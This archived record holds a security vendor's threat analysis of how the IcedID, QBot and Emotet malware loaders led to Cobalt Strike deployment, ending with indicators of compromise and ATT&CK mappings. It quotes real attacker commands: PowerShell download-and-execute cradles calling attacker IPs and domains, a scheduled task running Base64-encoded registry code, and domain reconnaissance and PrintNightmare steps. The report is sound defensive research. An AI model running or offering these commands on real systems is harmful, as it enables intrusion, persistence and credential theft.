{
	"id": "6ee73192-55f5-42b3-b5df-a6bbf425310e",
	"created_at": "2026-04-06T00:08:41.793395Z",
	"updated_at": "2026-04-10T13:11:45.633256Z",
	"deleted_at": null,
	"sha1_hash": "b2dce0510a73d9a78a757dbfb1e0b32294419dd7",
	"title": "THREAT ANALYSIS: Cobalt Strike - IcedID, Emotet and QBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3435387,
	"plain_text": "THREAT ANALYSIS: Cobalt Strike - IcedID, Emotet and QBot\r\nBy Cybereason Global SOC Team\r\nArchived: 2026-04-05 21:05:32 UTC\r\nThe Cybereason Global Security Operations Center Team (GSOC) issues Cybereason Threat Analysis reports to inform on\r\nimpactful threats. The Threat Analysis reports investigate these threats and provide practical recommendations for\r\nprotecting against them. \r\nIn this Threat Analysis report, the GSOC provides details about three recent attack scenarios where fast-moving malicious\r\nactors used the malware loaders IcedID, QBot, and Emotet to deploy the Cobalt Strike framework on the compromised\r\nsystems.\r\nThe deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack due to the framework’s\r\nhigh damage potential. One of the attack scenarios that we discuss in this article involves affiliates of the Conti ransomware\r\ngroup.\r\nCobalt Strike: Key Points\r\nFast-moving adversaries: The threat actors conducted malicious activities in the compromised systems only\r\napproximately 8 minutes after infecting the systems with the malware loader IcedID, QBot, or Emotet. The malicious\r\nactors deployed Cobalt Strike up to approximately 2 hours after accessing the compromised systems.\r\nTargeted phishing emails: Malicious actors, whom we attribute as affiliates of the Conti ransomware group,\r\nspecifically targeted a user by sending the user an email with an attachment (an Excel document) that was almost\r\nidentical to a legitimate email and email attachment already distributed to other users within the organization. The\r\ndifference was that the attached Excel document contained a malicious macro that distributed IcedID.\r\nDetected and prevented: The Cybereason XDR Platform effectively detects and prevents the IcedID, QBot, and\r\nEmotet malware. 
\r\nCybereason Managed Detection and Response (MDR): The Cybereason GSOC has zero tolerance towards attacks\r\nthat involve malware loaders, such as IcedID, QBot, and Emotet, and categorizes such attacks as critical, high-severity incidents. The Cybereason GSOC MDR Team issues a comprehensive report to customers when such an\r\nincident occurs. The report provides an in-depth overview of the incident, which helps scope the extent of\r\ncompromise and the impact on the customer’s environment. In addition, the report provides attribution information\r\nwhen possible as well as recommendations for mitigating and isolating the threat.\r\nIntroduction to Cobalt Strike\r\nCobalt Strike is an adversary simulation framework with the primary use case of assisting red team operations. However,\r\nCobalt Strike is also actively used by malicious actors for conducting post-intrusion malicious activities. Cobalt Strike is a\r\nmodular framework with an extensive set of features that are useful to malicious actors, such as command execution,\r\nprocess injection, and credential theft.\r\nThe deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack: for example, once\r\nCobalt Strike runs on a compromised system, the Cobalt Strike operators can broker the system as an initial access point to\r\nother threat actors, including ransomware group affiliates.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot\r\nPage 1 of 24\n\nIn the period between October 2021 and the time of writing this article, the Cybereason GSOC has observed multiple attack\r\nscenarios where malicious actors used malware that is capable of deploying additional malware on compromised systems\r\n(i.e. 
malware loaders) to deploy Cobalt Strike on the systems.\r\nIn this article, we present the activities of the malware loaders and the malicious actors that operated the loaders in three\r\nselected attack scenarios. Each scenario involves one of the malware loaders IcedID, QBot, and Emotet, and results in the\r\ndeployment of Cobalt Strike. One of the attack scenarios that we discuss in this article involves affiliates of the Conti\r\nransomware group.\r\nMalicious actors use the IcedID malware to distribute various types of malware, including ransomware, to compromised\r\nsystems. Malicious actors typically infect systems with IcedID through attachments, usually Microsoft Office documents, in\r\nphishing emails. Once deployed on a system, IcedID uses legitimate system utilities to conduct malicious activities, such as\r\nreconnaissance activities and disabling security mechanisms. Malicious actors also use the IcedID malware to deploy Cobalt\r\nStrike on compromised systems. \r\nQBot, also known as Qakbot, is malware that has been present on the threat landscape since 2007. QBot originally\r\nfeatured information stealing and trojan functionalities; however, the malicious actors that develop QBot have extended the\r\nmalware with malware loading capabilities. In recent attack campaigns, malicious actors distribute QBot through malicious\r\nattachments in phishing emails. QBot downloads and executes additional malware on compromised machines, such as the\r\nCobalt Strike framework, and ransomware, such as REvil and ProLock. \r\nSince security researchers first discovered the Emotet malware in 2014, the malware has evolved from a traditional banking\r\nTrojan to a malware loader. 
Over the last few years, before authorities disrupted the infrastructure of Emotet operators as\r\npart of a global operation in the first quarter of 2021, malicious actors had been using Emotet to deliver the Ryuk\r\nransomware to compromised systems.\r\nOn November 15, 2021, security researchers announced the discovery of a new variant of Emotet on the threat landscape.\r\nThe Cybereason GSOC team observed attack scenarios that involved the new Emotet malware shortly thereafter, which\r\ninvolved Emotet deploying Cobalt Strike on compromised systems.\r\nAnalysis of Cobalt Strike\r\nFrom IcedID to Cobalt Strike: Conti Ransomware Affiliates\r\nThe figure below depicts an infection using the IcedID malware that results in the deployment of Cobalt Strike. In this\r\nscenario, the malicious actors, whom we attribute as affiliates of the Conti ransomware group, specifically targeted a user by\r\nsending the user an email with an attachment (an Excel document) that is almost identical to a legitimate email and email\r\nattachment already distributed to other users within the organization.\r\nThe difference was that the attached Excel document contained a malicious macro. This indicates a potential long-term\r\npresence of the actors in the environment:\r\nAn infection using the IcedID malware\r\nWhen the targeted user executed the macro, the macro downloaded the executable file of the IcedID malware from an\r\nattacker-controlled endpoint and then executed the file. 
The macro downloaded the IcedID executable to the home directory\r\nof the user, such as C:\\Users\\test\\javabridge64.exe, where javabridge64.exe is the name of the IcedID executable and\r\nC:\\Users\\test is the home directory of the user test:\r\nMalicious Office macro executes IcedID javabridge64.exe as seen in the Cybereason XDR Platform\r\nApproximately 8 minutes after the malicious Office macro executed IcedID, the malicious actors executed the SysInfo\r\nIcedID command to enumerate relevant system information, such as active processes, and to conduct the following\r\nreconnaissance activities:\r\nIcedID executed the following command to retrieve a list of the security solutions that are installed on the\r\ncompromised system:\r\nwmic /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nIcedID executed the command ipconfig /all to retrieve the networking configuration of the compromised system.\r\nIcedID executed the systeminfo.exe Windows utility to retrieve detailed information about the compromised system,\r\nsuch as operating system version and hardware configuration.\r\nIcedID executed the following commands to retrieve Active Directory (AD)-related information:\r\nnet view /all\r\nnet view /all /domain\r\nnet config workstation\r\nnet group \"Domain Admins\" /domain\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nIcedID reconnaissance activities as seen in the Cybereason XDR Platform\r\nApproximately 20 minutes after conducting reconnaissance activities, the malicious actors executed the ExecAdmin IcedID\r\ncommand that attempts to elevate user privileges using a known Windows User Account Control (UAC) bypass that\r\nleverages the 
fodhelper Windows utility. \r\nAfter approximately 5 minutes, the malicious actors executed the Exec IcedID command to execute code by injecting the\r\ncode into a cmd.exe instance. Approximately 21 minutes later, the malicious actors executed a Cobalt Strike loader using the\r\ncommand rundll32 adobe.dll,kasim (where kasim is a dynamic-link library (DLL) entry point):\r\nExecution of Cobalt Strike loader as seen in the Cybereason XDR Platform\r\nA few minutes after executing the Cobalt Strike loader, the actors downloaded and executed PowerShell code from the\r\nattacker-controlled endpoint with an IP address of 185.70.184[.]8 by executing the PowerShell command: \r\nIEX ((new-object net.webclient).downloadstring('http://185.70.184[.]8:80/a')). \r\nThis attributes the actors as Conti affiliates, since the Conti group operated the endpoint with the IP address 185.70.184[.]8\r\nin the week when the attack that we discussed took place. In addition, the security community has observed Conti affiliates\r\nusing the IcedID malware to deploy Cobalt Strike on compromised systems.\r\nTo deploy the IcedID malware, the Conti affiliates targeted a particular user. At a larger scale, in the middle of 2021, we\r\nobserved malicious actors deploying the IcedID malware on systems as part of the “stolen images evidence” campaign,\r\nwhich we discuss in the following section.\r\nStolen Images Evidence Campaign\r\nThis “stolen images evidence” campaign involved phishing emails that legitimate organization contact forms had generated\r\nand sent to the targeted users (the contact form recipients). The emails contained legal threats related to copyright\r\ninfringement due to the use of copyright-protected images that the targeted user had apparently stolen. The emails urged the\r\nrecipient to sign into a Google page that supposedly lists the images. 
After the user signed into the page using valid Google\r\ncredentials, the page downloaded and executed a malicious JavaScript (.js) script using the Windows wscript utility. \r\nThe script executed a Base64-encoded PowerShell command to download and execute the IcedID malware, for example:\r\nIEX(New-Object Net.WebClient).downloadString('http://minerdone[.]top/222g100/index.php').\r\nThe execution of this PowerShell command led to downloading and executing a DLL through the DllRegisterServer entry\r\npoint, such as:\r\nrundll32.exe C:\\Users\\user\\AppData\\Local\\Temp\\VhfNmz.dat,DllRegisterServer.\r\nThis DLL conducted the first stage of deployment of the IcedID malware, and we refer to it as the first-stage IcedID DLL:\r\nDownload and execution of first-stage IcedID DLL as seen in the Cybereason XDR Platform\r\nThe first-stage DLL gathered information about the compromised machine, such as hardware and operating system\r\ninformation, and downloaded data from an attacker-controlled endpoint, such as grenademetto[.]uno. The data was\r\nencrypted using a symmetric encryption key. \r\nThe first-stage IcedID DLL decrypted the data that it had downloaded, which contained a DLL file and a data file that\r\ntypically had the name license.dat. The first-stage IcedID DLL typically wrote the DLL file in the user’s %LocalAppData%\r\ndirectory, such as:\r\nC:\\Users\\user\\AppData\\Local\\Temp\\rebuildx32.tmp, and the license.dat file in the user’s %AppData% directory. \r\nThe first-stage IcedID DLL then executed the DLL file, such as:\r\nrundll32.exe \"C:\\Users\\user\\AppData\\Local\\Temp\\rebuildx32.tmp\",update /i:\"ApproveFinish\\license.dat\", which we refer\r\nto as the second-stage IcedID DLL.\r\nThe main functionality of the second-stage IcedID DLL was to locate and process the license.dat file. 
license.dat contained\r\nencrypted content that implemented the IcedID malware. The second-stage IcedID DLL decrypted the content of license.dat\r\nand executed the IcedID malware by injecting the malware into a legitimate Windows process, such as chrome.exe:\r\nSecond-stage IcedID DLL injects IcedID into chrome.exe as seen in the Cybereason XDR Platform\r\nFrom QBot to Cobalt Strike\r\nThe figure below depicts an infection using the QBot malware that results in the deployment of Cobalt Strike:\r\nAn infection using the QBot malware\r\nMalicious actors distribute QBot as attachments, typically Microsoft Office Excel documents, to phishing emails. The Office\r\nExcel application prompts the user that has opened the document that distributes QBot to enable Office macro execution.\r\nWhen the Office macro executes, the macro first downloads the QBot malware from an attacker-controlled endpoint and\r\nthen executes the malware. \r\nIn the attack scenario that we analyzed, the macro stored the file that implements the QBot malware in the %ProgramData%\r\ndirectory, such as C:\\ProgramData, under a filename with the extension .ocx, such as Volet1.ocx (other names include, for example,\r\nVolet2.ocx and Volet3.ocx). The .ocx file was a Windows DLL file that the macro executed using the regsvr32 Windows\r\nutility. 
The DLL unpacked and loaded a Windows DLL named stager_1.dll that implements the main QBot functionalities.\r\nIn addition, the DLL injected stager_1.dll into a legitimate Windows process, msra.exe:\r\nOffice Excel macro executes QBot as seen in the Cybereason XDR Platform\r\nApproximately 6 minutes after injecting stager_1.dll into msra.exe, Qbot conducted reconnaissance activities by executing\r\nthe commands net, arp, ipconfig, netstat, nslookup, route, and whoami. The figure below depicts the execution of these\r\ncommands, including command line parameters:\r\nQbot reconnaissance activities as seen in the Cybereason XDR Platform\r\nApproximately 1 minute after conducting reconnaissance activities, QBot established persistence on the compromised\r\nsystem by executing the following command:\r\nschtasks.exe /Create /F /TN \"{AO8F7C8F-D95F-4395-8732-9818EO0F3DB2}\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\Cvdijvkees).omowidpdnpcwb))) \" /SC MINUTE /MO 30\r\nThis command creates a scheduled task named {AO8F7C8F-D95F-4395-8732-9818EO0F3DB2} that runs every 30 minutes and executes\r\nBase64-encoded PowerShell code stored in the omowidpdnpcwb value of the registry key HKEY_CURRENT_USER\\SOFTWARE\\Cvdijvkees.\r\nApproximately 48 minutes after creating the scheduled task, Qbot injected Rubeus, a tool for attacking Kerberos deployments,\r\ninto the legitimate Windows Update process wuauclt.exe. After approximately 18 minutes, QBot stole web browser data,\r\nsuch as cookies and browsing history, using the recovery functionality of the esentutl Windows utility. 
\r\nAfter approximately 2 minutes, QBot attempted to exploit the PrintNightmare vulnerability by executing the Invoke-Nightmare PowerShell command to create an administrative user with the username admin1 and password Password. \r\nAfter approximately 48 minutes, QBot injected a Cobalt Strike module into msra.exe that contacted attacker-controlled\r\nendpoints known to be associated with Cobalt Strike at the time the attack took place:\r\nQbot uses the esentutl Windows utility to steal web browser data as seen in the Cybereason XDR Platform\r\nQbot injects Rubeus into wuauclt.exe and executes Invoke-Nightmare as seen in the Cybereason XDR Platform\r\nFrom Emotet to Cobalt Strike\r\nThe figure below depicts an infection using the Emotet malware that results in the deployment of Cobalt Strike:\r\nAn infection using the Emotet malware\r\nMalicious actors distribute Emotet as attachments, typically Microsoft Office Word or Excel documents, to phishing emails.\r\nIn addition to Office documents, malicious actors distribute Emotet through links that lead to Office documents, archive files\r\nthat store Office documents, and Universal Windows Application installation packages that download and execute Emotet\r\nwhen a user executes the installation package:\r\nPhishing email with attached Microsoft Word doc that distributes Emotet\r\nDistribution: Office Word Document\r\nIf an Office Word document distributes Emotet, the Office Word application first prompts the user that has opened the\r\ndocument to enable Office macro execution:\r\nOffice Word application prompts a user to enable macro execution\r\nWhen the user enables macro execution, a malicious Office macro that is part of the Word document and that distributes\r\nEmotet executes. The macro first deobfuscates macro code by removing character arrays, such as Cew (see the figure\r\nbelow), and then executes the deobfuscated macro code:\r\nImplementation of a malicious macro that distributes Emotet\r\nThe deobfuscated macro code executes PowerShell code. The PowerShell code establishes a connection to an attacker-controlled endpoint and downloads Emotet to the %ProgramData% directory, such as C:\\ProgramData.\r\nEmotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the PowerShell code stores\r\nunder a random filename in the %ProgramData% directory. The PowerShell code then uses the rundll32 Windows utility to\r\nexecute Emotet:\r\nDeobfuscated macro code executes PowerShell that downloads and executes Emotet as seen in the Cybereason XDR Platform\r\nAs an alternative to executing the PowerShell code directly, the deobfuscated macro code may first create a Windows Batch\r\n(.bat) file in the %ProgramData% directory under a random name, such as C:\\ProgramData\\sdfhiuwu.bat or yksds.bat, and\r\nthen execute the file. 
The .bat file stores obfuscated code that includes Base64-encoded code and code that is stored in\r\nmultiple string variables.\r\nThe obfuscated code in the .bat file executes the PowerShell code that downloads Emotet and then uses the rundll32 Windows\r\nutility to execute it:\r\nDeobfuscated macro code creates a Windows Batch file\r\nA Windows batch (.bat) file that contains obfuscated code\r\nExecution of .bat file (yksds.bat) that executes PowerShell code which downloads and executes Emotet as seen in the Cybereason XDR Platform\r\nThe PowerShell code uses the rundll32 Windows utility and specifies the DLL entry point Control_RunDLL or\r\nDllRegisterServer to execute Emotet. We observed that rundll32 maps the Emotet DLL file under the internal name of X.dll:\r\nrundll32 executes Emotet: DllRegisterServer DLL entry point as seen in the Cybereason XDR Platform\r\nrundll32 maps an Emotet DLL file under the internal name of X.dll as seen in the Cybereason XDR Platform\r\nDistribution: Office Excel Document\r\nIf an Office Excel document distributes Emotet, the Office Excel application prompts the user that has opened the document\r\nto enable Office macro execution. The Excel document contains several hidden Excel worksheets that store malicious Office\r\nmacros that distribute Emotet.\r\nWhen the user enables macro execution, the Office macros execute:\r\nOffice Excel application prompts a user to enable macro execution\r\nThe macros establish a connection to an attacker-controlled endpoint to download the Emotet malware. 
Emotet typically\r\narrives from the attacker-controlled endpoint in the form of a DLL file that the macros store under a filename with the\r\nextension .ocx, such as besta.ocx, bestb.ocx, or bestc.ocx. \r\nThe macros use the rundll32 Windows utility and specify the DLL entry point Control_RunDLL or DllRegisterServer to\r\nexecute Emotet. The macros may obfuscate the DLL entry point name by appending the ampersand (\u0026) character to\r\nindividual characters of the name:\r\nrundll32 executes Emotet: DllRegisterServer DLL entry point as seen in the Cybereason XDR Platform\r\nMalicious Activities\r\nWhen Emotet executes on a compromised system, the malware first establishes persistence by creating system services that\r\nstart at system startup or by creating registry values at the\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key:\r\nEmotet (DLL file: oxneternhgbtah.ybc) establishes persistence on a compromised system as seen in the Cybereason XDR Platform\r\nEmotet then executes processes that conduct malicious activities. The processes that Emotet executes have random names\r\nand are child processes of the rundll32 process that executes Emotet. \r\nIn the attack scenario that we analyzed, Emotet executed a process that steals cookies or web and email credentials from\r\nclient credential databases. Emotet used the keyword scomma in the process command line to execute\r\nWebBrowserPassView, a tool that steals web credentials from browser credential databases. 
Emotet then exfiltrated data\r\nfrom the compromised system to attacker-controlled endpoints:\r\nEmotet executes processes that conduct malicious activities as seen in the Cybereason XDR Platform\r\nEmotet executes the WebBrowserPassView tool as seen in the Cybereason XDR Platform\r\nEmotet exfiltrates data as seen in the Cybereason XDR Platform\r\nAfter Emotet exfiltrated data, the Emotet operators deployed the Cobalt Strike framework on the compromised system.\r\nEmotet deployed a Cobalt Strike beacon in the form of a DLL file and executed the beacon by invoking the\r\nDllRegisterServer DLL entry point.\r\nDetection and Prevention of Emotet\r\nCybereason XDR Platform\r\nThe Cybereason XDR Platform is able to detect and prevent IcedID, QBot, and Emotet using multi-layer protection that\r\ndetects and blocks malware with threat intelligence, machine learning, and Next-gen Antivirus (NGAV) capabilities:\r\nCybereason XDR Platform detects IcedID injecting code into a cmd.exe instance\r\nCybereason XDR Platform detects IcedID executing a Cobalt Strike loader implemented in adobe.dll\r\nCybereason XDR Platform detects a malicious Office macro executing QBot using the regsvr32 Windows utility\r\nCybereason XDR Platform detects a malicious Office Excel document that distributes Emotet\r\nCybereason GSOC MDR\r\nThe Cybereason GSOC recommends the following:\r\nEnable the Anti-Malware feature in the Cybereason NGAV module and enable the Detect and Prevent modes of this\r\nfeature.\r\nSecurely handle email messages that originate from external sources. 
This includes disabling hyperlinks and\r\ninvestigating the content of email messages to identify phishing attempts.\r\nThreat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting queries for\r\ndetecting specific threats. To find out more about threat hunting and Managed Detection and Response with the\r\nCybereason Defense Platform, contact a Cybereason Defender here.\r\nFor Cybereason customers: More details are available on the NEST, including custom threat hunting queries for\r\ndetecting this threat.\r\nCybereason is dedicated to teaming up with defenders to end cyber attacks from endpoints to the enterprise to everywhere.\r\nSchedule a demo today to learn how your organization can benefit from an operation-centric approach to security.\r\nIndicators of Compromise\r\nExecutables\r\nSHA-1 hash: a4d415c07b4ff77c6bd792c32fc46bfc6a1b0354\r\nSHA-1 hash: e8992a283f9f37dec617b305db2790d9112d3a20\r\nDomains\r\nzasewalli[.]fun\r\nendofyour[.]ink\r\npedrosimanez[.]fun\r\nkingflipp[.]online\r\nbeliale232634[.]at\r\nbelialw869367[.]at\r\nbelialq449663[.]at\r\nIP Addresses\r\n23.111.114[.]52\r\n104.168.44[.]130\r\n185.70.184[.]8\r\nMITRE ATT\u0026CK Techniques: Cobalt Strike, IcedID, Emotet and QBot\r\nInitial Access: Phishing: Spearphishing Attachment\r\nExecution: User Execution: Malicious File; Windows Management Instrumentation\r\nPersistence: Scheduled Task/Job: Scheduled Task\r\nDefense Evasion: Abuse Elevation Control Mechanism: Bypass User Account Control; Signed Binary Proxy Execution: Regsvr32; Signed Binary Proxy Execution: Rundll32; Modify Registry\r\nCredential Access: Credentials from Web Browsers\r\nDiscovery: Account Discovery; Domain Trust Discovery; Network Service Scanning; Remote System Discovery\r\nLateral Movement: Remote Services: Remote Desktop Protocol\r\nExfiltration: Exfiltration Over Alternative Protocol\r\nAbout the Researchers:\r\nEli Salem, Senior Security Analyst, Cybereason Global SOC\r\nEli is a lead threat hunter and malware reverse engineer at Cybereason. He has worked in the private sector of the cyber\r\nsecurity industry since 2017. In his free time, he publishes articles about malware research and threat hunting.\r\nAleksandar Milenkoski, Senior Malware and Threat Analyst, Cybereason Global SOC\r\nAleksandar Milenkoski is a Senior Malware and Threat Analyst with the Cybereason Global SOC team. He is involved\r\nprimarily in reverse engineering and threat research activities. Aleksandar has a PhD in system security. For his research\r\nactivities, he has been awarded by SPEC (Standard Performance Evaluation Corporation), the Bavarian Foundation for\r\nScience, and the University of Würzburg, Germany. Prior to Cybereason, his work focussed on research in intrusion\r\ndetection and reverse engineering security mechanisms of the Windows operating system.\r\nBrian Janower, Security Analyst, Cybereason Global SOC\r\nBrian Janower is a Security Analyst with the Cybereason Global SOC team. He is involved in malware analysis and triages\r\nsecurity incidents effectively and precisely. Brian has a deep understanding of the malicious operations prevalent in the\r\ncurrent threat landscape. He is in the process of obtaining a Bachelor of Science degree in Systems Information \u0026 Cyber.\r\nYonatan Gidnian, Senior Security Analyst and Threat Hunter, Cybereason Global SOC\r\nYonatan Gidnian is a Senior Security Analyst and Threat Hunter with the Cybereason Global SOC team. Yonatan analyses\r\ncritical incidents and hunts for novel threats in order to build new detections. He began his career in the Israeli Air Force\r\nwhere he was responsible for protecting and maintaining critical infrastructures. Yonatan is passionate about malware\r\nanalysis, digital forensics, and incident response.\r\nRotem Rostami, Security Analyst, Cybereason Global SOC\r\nRotem Rostami is a Security Analyst with the Cybereason Global SOC (GSOC) team. She is involved in malware analysis\r\nactivities and triages security incidents effectively and precisely. Rotem has a deep understanding of the malicious\r\noperations prevalent in the current threat landscape. Rotem has been working in the cybersecurity industry since 2018.\r\nSource: https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot"
	],
	"report_names": [
		"threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434121,
	"ts_updated_at": 1775826705,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b2dce0510a73d9a78a757dbfb1e0b32294419dd7.pdf",
		"text": "https://archive.orkl.eu/b2dce0510a73d9a78a757dbfb1e0b32294419dd7.txt",
		"img": "https://archive.orkl.eu/b2dce0510a73d9a78a757dbfb1e0b32294419dd7.jpg"
	}
}